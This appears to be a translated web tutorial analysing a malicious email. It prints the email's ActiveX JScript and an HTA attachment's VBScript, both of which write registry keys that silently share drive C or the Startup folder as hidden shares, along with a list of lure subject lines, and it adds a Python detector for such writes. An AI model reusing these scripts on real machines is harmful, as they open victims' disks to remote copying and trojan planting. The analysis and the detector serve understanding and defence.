
How a Suspicious Email Shares Your Hard Disk

Published: 2019-12-12 11:11:36 Category: MsSql Tutorials Source: 蓝点
function f() //function that rewrites the registry
  {
  var aa,ss;
  aa=document.applets[0];
  aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
  aa.createInstance();
  ss=aa.GetObject();
  ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Flags",302,"REG_DWORD");
  ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Type",0,"REG_DWORD");
  ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Path","C:");
  }
  function init()
  {
  setTimeout("f()", 1000); //run f() once after a 1000 ms delay
  }
  init(); //call the function
  </script>
  </BODY></HTML>
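  This email exploits the registry-writing capability of the MS ActiveX component. As soon as you read the message, it adds a key named C$ under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan in the registry and sets drive C to fully shared! A hacker can then log on to your C drive directly with an SMB scanner and freely copy, delete and add files on the disk. He can also upload a trojan to you and take permanent, complete control of your machine.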
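A triage check for the registry writes described above, as an added example that is not part of the original article: it scans a mail body or script attachment for RegWrite calls under the Network\LanMan key and reports each share they would create. It generalizes beyond the listing by accepting both the JScript call form and the VBScript form without parentheses; the function names and the SAMPLE text are constructed for illustration.

```python
import re

# Match RegWrite on ...\Network\LanMan\<share>\<value>, written either as
# RegWrite("key", data) or RegWrite "key", data; SEP accepts \ and \\.
SEP = r'[\\/]+'
LANMAN_WRITE = re.compile(
    r'RegWrite\s*\(?\s*"(?:HKLM|HKEY_LOCAL_MACHINE)' + SEP
    + SEP.join(["Software", "Microsoft", "Windows", "CurrentVersion", "Network", "LanMan"])
    + SEP + r'([^\\/"]+)' + SEP + r'(\w+)"\s*,\s*("[^"]*"|[^,)\s]+)',
    re.IGNORECASE)
# CLSID the page's script passes to setCLSID before calling RegWrite.
SHELL_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
DRIVE_ROOT = re.compile(r'^[A-Za-z]:[\\/]*$')

def find_share_writes(text):
    """Return {share: {value_name: data}} for each LanMan share key written."""
    shares = {}
    for share, name, data in LANMAN_WRITE.findall(text):
        shares.setdefault(share, {})[name.lower()] = data.strip('"')
    return shares

def triage(text):
    """Return a list of human-readable findings for one script or mail body."""
    findings = []
    if SHELL_CLSID.lower() in text.lower():
        findings.append("instantiates CLSID " + SHELL_CLSID)
    for share, values in sorted(find_share_writes(text).items()):
        notes = []
        if share.endswith("$"):
            notes.append("hidden ($) name")  # $-suffixed shares are hidden from browsing
        path = values.get("path")
        if path and DRIVE_ROOT.match(path):
            notes.append("path is a drive root")
        findings.append("creates share %s (%s) values=%s"
                        % (share, ", ".join(notes) or "no extra notes", sorted(values)))
    return findings

# Constructed sample: the RegWrite calls from the page's listing with their
# backslashes escaped, plus one VBScript-style call without parentheses.
SAMPLE = r'''
aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Flags",302,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Type",0,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Path","C:");
aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\S$\Path",dir1
'''

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE)))
```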
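  Now let's look at the attachment Laugh.hta. I checked "File Types" and found that the ".hta" extension is actually an HTML Application file, which Mshta.exe can interpret and execute. It looks like a text file just like WSH and VBS, so I exported it as a Txt file. Ha! Everything is visible!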
  <html>
  <script language=vbs>
  On Error Resume Next ' error-tolerance statement, keeps the program from crashing
  set aa=CreateObject("WScript.Shell") ' create the WScript object
  Set fs = CreateObject("Scripting.FileSystemObject") ' create the file system object
  Set dir1 = fs.GetSpecialFolder(0) ' get the Windows path
  Set dir2 = fs.GetSpecialFolder(1) ' get the System path
  dir1=dir1+"\START MENU\PROGRAMS\启动" ' 启动 is the Startup folder on Chinese-language Windows
  aa.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\S$\Flags",302,"REG_DWORD" ' write the DWORD value Flags, the flag for the share type
  aa.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\S$\Type",0,"REG_DWORD" ' write the DWORD value Type
  aa.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\S$\Path",dir1 ' write the absolute path of the shared resource
  a=10
  Set Os = CreateObject("Scriptlet.TypeLib") ' create a custom enumeration object
  doc="“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”“How about have dinner with me together?”"
  ' a pile of junk text, ready to be written to the target file

(Editor: 威海站长网)
